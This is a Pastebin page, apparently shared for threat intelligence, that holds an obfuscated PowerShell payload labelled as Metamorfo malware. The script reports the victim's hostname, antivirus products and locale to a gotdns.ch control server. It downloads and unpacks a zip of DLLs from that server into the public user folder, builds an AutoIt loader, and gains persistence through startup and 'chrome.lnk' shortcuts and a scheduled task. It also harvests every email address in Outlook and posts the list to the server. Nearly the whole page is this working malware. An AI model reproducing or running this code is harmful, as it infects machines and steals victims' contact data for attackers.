API tools faq
paste
1ZRR4H

Metamorfo Payload 01042020

1ZRR4H
Apr 1st, 2020
2,553
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.47 KB | None | 0 0
raw download clone embed print report
  1. function ____///////// {
  2. [cmdletBinding()]
  3. param (
  4. [string]$ComputerName = "$env:computername" ,
  5. $Credential
  6. )
  7. BEGIN
  8. {
  9. $wmiQuery = "SELECT * FROM AntiVirusProduct"
  10. }
  11. PROCESS
  12. { $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
  13. $AntivirusNames = $AntivirusProduct.displayName
  14. $lang = Get-Culture
  15. $lang = $lang.displayname
  16. $WebRequest = [System.Net.WebRequest]::Create("http://vqz8.gotdns.ch/mx/J8v0x5a3a6v4x0BTCsc/kk/index.php")
  17. $GlobalListStr = [System.Text.Encoding]::UTF8.GetBytes("AT=$env:computername $AntivirusNames $lang ")
  18. $WebRequest.Method = 'POST'
  19. $WebRequest.ContentType = 'application/x-www-form-urlencoded'
  20. $WebRequest.ContentLength = $GlobalListStr.length
  21. $RequestStream = $WebRequest.GetRequestStream()
  22. $RequestStream.Write($GlobalListStr, 0, $GlobalListStr.length)
  23. $RequestStream.Close()
  24. }
  25. END {
  26. }
  27. }
  28. ____/////////
  29. ${_/|\_/|////\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQB4AGUA')))
  30. ${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('egBpAHAA')))
  31. ${_/|\_/|////\__|//\\\\\\\\/|_} = "http://vqz8.gotdns.ch/mx/J8v0x5a3a6v4x0BTCscMD/kk/md.zip"
  32. ${_/|\_/|/\\\\\\\/|_} = "public"
  33. ${_\\\\\\/|\_/|/\\\\\\\/|_} = "c:\users\${_/|\_/|/\\\\\\\/|_}"
  34. Function ____////////\\\/\/\/\/\_____ {
  35. ${_|||||||||||||________________} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
  36. ${_|||||||||||||//////________________} = "2_","3_","4_","5_","6_","7_","8_","9_"
  37. ${_|||||||||||||//////\\\\\________________} = $null
  38. ${__|||||||||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________} -Count 6
  39. ${__||||||_|||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||//////________________} -Count 1
  40. ${__||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1
  41. foreach($n in ${__|||||||||||||//////\\\\\________________}) {
  42. ${_|||||||||||||//////\\\\\________________} += $n
  43. }
  44. foreach ($n2 in ${__||||||_|||||||//////\\\\\________________}) {
  45. ${_|||||||||||||//////\\\\\________________} += $n2
  46. }
  47. foreach ($n3 in ${__||||||_||||||_|//////\\\\\________________}) {
  48. ${_|||||||||||||//////\\\\\________________} += $n3
  49. }
  50. return "_${_|||||||||||||//////\\\\\________________}"
  51. }
  52. ${_\\\\\\/|\_/|/\\\___\\\\/|_} = ____////////\\\/\/\/\/\_____
  53. ${_\\\\\__\/|\_/|/\\\___\\\\/|_} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\b.ar"
  54. ${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_} = if (${_\\\\\__\/|\_/|/\\\___\\\\/|_}) { Test-Path ${_\\\\\__\/|\_/|/\\\___\\\\/|_} }
  55. ${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_}
  56. if(${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_} -eq 'True'){
  57. exit
  58. }else{
  59. New-Item -ItemType directory -Path ${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}
  60. ${_\\\///////\\\\\\\\\\/_} = new-object System.Net.WebClient
  61. ${_\\\///////\\\\\\\\\\/_}.DownloadFile(${_/|\_/|////\__|//\\\\\\\\/|_},"${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.zip")
  62. ${_\\\//////||\||||/\\\\\\\/_} = new-object -com shell.application
  63. ${_/\/\/\/\/\/\/\/_} = ${_\\\//////||\||||/\\\\\\\/_}.namespace("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_}")
  64. ${_/\/\/\/\/\/__|\\\||||||\/\/_} = ${_\\\//////||\||||/\\\\\\\/_}.namespace("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}")
  65. ${_/\/\/\/\/\/__|\\\||||||\/\/_}.Copyhere(${_/\/\/\/\/\/\/\/_}.items())
  66. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_/|\_/|////\__|/_|\\\\\\/|_}.png")
  67. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.LNS") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\12.dll")
  68. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\sqlite3.dll") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\sql.png")
  69. function _____/\_/\/\_/\/=\
  70. {
  71. Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
  72. try{
  73. ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
  74. ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
  75. ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
  76. ${/=\/\__/=\/=\/=\_}.Arguments = " ${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS ${_\\\\\\/|\_/|/\\\___\\\\/|_}"
  77. ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}"
  78. ${/=\/\__/=\/=\/=\_}.WindowStyle = 7
  79. ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
  80. ${/=\/\__/=\/=\/=\_}.Save()
  81. }finally{}
  82. }
  83. ${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
  84. ${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
  85. del ${/=\_/\_/===\/\/\/}\*.vbs
  86. del ${/=\_/\_/===\/\/\/}\*.lnk
  87. ${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
  88. ${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.lnk"
  89.  
  90. _____/\_/\/\_/\/=\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
  91.  
  92.  
  93. function _____/\_/\/\_/\/=\\///\/\/\
  94. {
  95. Param([string]${___/\_/=\\/\/\\___/\_/==},[string]${__||_/\_/=\\/\/\\___/\_/==});
  96. try{
  97. ${__||_/\_/=\\/\/||\\___/\_/==} = New-Object -ComObject WScript.Shell
  98. ${__||/=\\/\/||\\___/\_/==} = ${__||_/\_/=\\/\/||\\___/\_/==}.CreateShortcut(${___/\_/=\\/\/\\___/\_/==})
  99. ${__||/=\\/\/||\\___/\_/==}.TargetPath = "c:\users\${_/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.vbs"
  100. ${__||/=\\/\/||\\___/\_/==}.Arguments = ""
  101. ${__||/=\\/\/||\\___/\_/==}.Description = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBBAGMAZQBzAHMAYQByACAAYQAgAGkAbgB0AGUAcgBuAGUAdAAuACIA')));
  102. ${__||/=\\/\/||\\___/\_/==}.WorkingDirectory = ""
  103. ${__||/=\\/\/||\\___/\_/==}.IconLocation = "${_/\/\/\/\__/\|_||_|____}"
  104. ${__||/=\\/\/||\\___/\_/==}.Save()
  105. }finally{}
  106. }
  107.  
  108. ${_/\/\/\__\\\\\\\|||\/\/_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
  109. ${_/\/\/\__\\\\\\\|||\/\/_} | Set-Content "${_\\\\\\/|\_/|/\\\\\\\/|_}\b.ar"
  110. ${_/\/\/\__\\\\\\\|||\/\/_} | Out-File "${_\\\\\\/|\_/|/\\\\\\\/|_}\b.ar"
  111. ${_/\/\/\__\\\\\\\|||\/\/_} > "${_\\\\\\/|\_/|/\\\\\\\/|_}\b.ar"
  112.  
  113. ${___/\_/\/===\/\__} = "c:\users\public\chrome.lnk"
  114. _____/\_/\/\_/\/=\\///\/\/\ ${___/\_/\/===\/\__} ${__||_/\_/=\\/\/\\___/\_/==}
  115.  
  116. ${_/|\_/|//______//\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABpAG4AZQA=')))
  117. ${_/|\_\\\||||||||||///\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBtAGQA')))
  118. ${_/|\_\\\///\\/|_} = '86'
  119. ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_} = "$"
  120. $Arquivo = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS"
  121.  
  122. $ArquivoSaida ="${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS"
  123. Add-Content $Arquivo '#NoTrayIcon'
  124. Add-Content $Arquivo "Global ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_} = ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_/|\_\\\||||||||||///\\/|_}${_/|\_/|//______//\__|/_|\\\\\\/|_}[1]"
  125. Add-Content $Arquivo "Global ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_}${_/|\_\\\///\\/|_} = DllOpen('${_\\\\\\/|\_/|/\\\___\\\\/|_}.LNS')"
  126. Add-Content $Arquivo "DllCall(${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_}${_/|\_\\\///\\/|_}, 'STRUCT', 'JLI_CmdToArgs')"
  127.  
  128. $cmdFileName = "C:\Windows\explorer.exe "
  129. $TaskStartTime = [datetime]::Now.AddSeconds(180)
  130. $TaskEndTime = [datetime]::Now.AddSeconds(240)
  131. $taskName = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
  132. $service = New-Object -ComObject("Schedule.Service")
  133. $service.Connect()
  134. $rootFolder = $service.GetFolder("\")
  135. $TaskDefinition = $service.NewTask(0)
  136. $TaskDefinition.RegistrationInfo.Description = ""
  137. $TaskDefinition.Settings.Enabled = $true
  138. $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
  139. $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
  140. $triggers = $TaskDefinition.Triggers
  141. $trigger = $triggers.Create(1)
  142. $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
  143. $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
  144. $trigger.Enabled = $true
  145. $action = $TaskDefinition.Actions.Create(0)
  146. $action.Path = $cmdFileName
  147. $action.Arguments = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.lnk"
  148. $action = $TaskDefinition.Actions.Create(0)
  149. $action.Path = "schtasks.exe"
  150. $action.Arguments = "/Delete /TN $taskName /F"
  151. $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
  152. }
  153.  
  154.  
  155. Add-Type -assembly $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBPAGYAZgBpAGMAZQAuAEkAbgB0AGUAcgBvAHAALgBPAHUAdABsAG8AbwBrAA==')))
  156. ${_/=\/\__/=\/\/\__} = New-Object -comobject Outlook.Application
  157. ${____/===\_____/\/} = ${_/=\/\__/=\/\/\__}.GetNameSpace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBBAFAASQA='))))
  158. ${_/\/=====\__/=\/=} = [System.Collections.ArrayList]@()
  159. function ___/=\/\/=\___/=\_(${____/\____/\/\_/\_})
  160. {
  161. ${____/==\__/\_/=\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBbAF8AYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBfAGEALQB6ADAALQA5AC0AXQArACkAKgBAAFsAYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBhAC0AegAwAC0AOQAtAF0AKwApACoAKABcAC4AWwBhAC0AegBdAHsAMgAsADQAfQApACQA')));
  162. if (${____/\____/\/\_/\_} -match ${____/==\__/\_/=\_}) {
  163. return $true
  164. }
  165. return $false
  166. }
  167. function _/=\_/==\____/\__/(${____/\____/\/\_/\_}) {
  168. if (${____/\____/\/\_/\_}) {
  169. ${__/=====\/\_/\_/\} = $false
  170. ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.ToLower()
  171. if (${____/\____/\/\_/\_}.StartsWith("'") -And ${____/\____/\/\_/\_}.EndsWith("'")) {
  172. ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.Substring(1, ${____/\____/\/\_/\_}.Length - 2)
  173. }
  174. if (___/=\/\/=\___/=\_(${____/\____/\/\_/\_})) {
  175. for(${__/\/\__/=\/\__/\} = 0;${__/\/\__/=\/\__/\} -lt ${_/\/=====\__/=\/=}.Count;${__/\/\__/=\/\__/\}++) {
  176. if (${_/\/=====\__/=\/=}[${__/\/\__/=\/\__/\}] -eq ${____/\____/\/\_/\_}) {
  177. ${__/=====\/\_/\_/\} = $true
  178. break
  179. }
  180. }
  181. if (-Not ${__/=====\/\_/\_/\}) {
  182. ${__/\___/========\} = ${_/\/=====\__/=\/=}.Add(${____/\____/\/\_/\_})
  183. }
  184. }
  185. }
  186. }
  187. function _/====\__/=====\_/ {
  188. ${/==\/=\____/\_/=\} = ${____/===\_____/\/}.AddressLists
  189. for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${/==\/=\____/\_/=\}.Count;${__/\/\__/=\/\__/\}++) {
  190. ${/=\_/==\/\__/==\_} = ${/==\/=\____/\_/=\}.Item(${__/\/\__/=\/\__/\}).AddressEntries
  191. for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${/=\_/==\/\__/==\_}.Count;${/==\/\/\_/\_/\__/}++) {
  192. ${_/\_/\__/\_____/=} = ${/=\_/==\/\__/==\_}.Item(${/==\/\/\_/\_/\__/})
  193. ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
  194. ${____/\____/\/\_/\_} = ""
  195. if (${__/===\/===\/\/\_} -eq 10) {
  196. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
  197. } elseif ((${__/===\/===\/\/\_} -eq 3) -Or (${__/===\/===\/\/\_} -eq 1) -Or (${__/===\/===\/\/\_} -eq 4) -Or (${__/===\/===\/\/\_} -eq 2) -Or (${__/===\/===\/\/\_} -eq 5) -Or (${__/===\/===\/\/\_} -eq 0)) {
  198. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
  199. }
  200. _/=\_/==\____/\__/(${____/\____/\/\_/\_})
  201. }
  202. }
  203. }
  204. function __/\/\__/\_/===\_/(${___/\/==\_/==\/=\/}) {
  205. for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${___/\/==\_/==\/=\/}.Count;${__/\/\__/=\/\__/\}++) {
  206. ${_/======\_/=\/=\_} = ${___/\/==\_/==\/=\/}.Item(${__/\/\__/=\/\__/\})
  207. ${__/\/=\___/\_/==\} = ${_/======\_/=\/=\_}.Items
  208. for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${__/\/=\___/\_/==\}.Count;${/==\/\/\_/\_/\__/}++) {
  209. ${_/==\_____/==\__/} = ${__/\/=\___/\_/==\}.Item(${/==\/\/\_/\_/\__/})
  210. ${/=\/====\____/=\/} = ${_/==\_____/==\__/}.Recipients
  211. for(${_/\_/\__/\/\_/=\_} = 1;${_/\_/\__/\/\_/=\_} -le ${/=\/====\____/=\/}.Count;${_/\_/\__/\/\_/=\_}++) {
  212. ${__/\_/\__/=\/\_/\} = ${/=\/====\____/=\/}.Item(${_/\_/\__/\/\_/=\_})
  213. ${_/\_/\__/\_____/=} = ${__/\_/\__/=\/\_/\}.AddressEntry
  214. ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
  215. ${____/\____/\/\_/\_} = "";
  216. if (${__/===\/===\/\/\_} -eq 0) {
  217. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
  218. } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
  219. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
  220. }
  221. _/=\_/==\____/\__/(${____/\____/\/\_/\_})
  222. }
  223. ${_/\_/\__/\_____/=} = ${_/==\_____/==\__/}.Sender
  224. ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
  225. ${____/\____/\/\_/\_} = "";
  226. if (${__/===\/===\/\/\_} -eq 0) {
  227. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
  228. } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
  229. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
  230. }
  231. _/=\_/==\____/\__/(${____/\____/\/\_/\_})
  232. }
  233. __/\/\__/\_/===\_/(${_/======\_/=\/=\_}.Folders)
  234. }
  235. }
  236. function ____/=\_/\_/==\/==() {
  237. _/====\__/=====\_/
  238. __/\/\__/\_/===\_/(${____/===\_____/\/}.Folders)
  239. Add-Content $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAC4ATwB1AHQAbABvAG8AawA='))) ${_/\/=====\__/=\/=}
  240.  
  241. $WebRequest = [System.Net.WebRequest]::Create("http://vqz8.gotdns.ch/mx/lists/kk/index.php?list")
  242. $GlobalListStr = [System.Text.Encoding]::UTF8.GetBytes("list=$(${_/\/=====\__/=\/=} -join ';')")
  243. $WebRequest.Method = 'POST'
  244. $WebRequest.ContentType = 'application/x-www-form-urlencoded'
  245. $WebRequest.ContentLength = $GlobalListStr.length
  246. $RequestStream = $WebRequest.GetRequestStream()
  247. $RequestStream.Write($GlobalListStr, 0, $GlobalListStr.length)
  248. $RequestStream.Close()
  249. [System.Net.WebResponse] $WebResponse = $WebRequest.GetResponse()
  250.  
  251. }
  252. function _/=\/\/\_/\____/=\() {
  253. ${__/==\/\__/\/===\} = [System.IO.File]::Exists(${__/======\____/\_})
  254. if (-Not ${__/==\/\__/\/===\}) {
  255. "" | sc ${__/======\____/\_}
  256. ____/=\_/\_/==\/==
  257. }
  258. }
  259. _/=\/\/\_/\____/=\
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!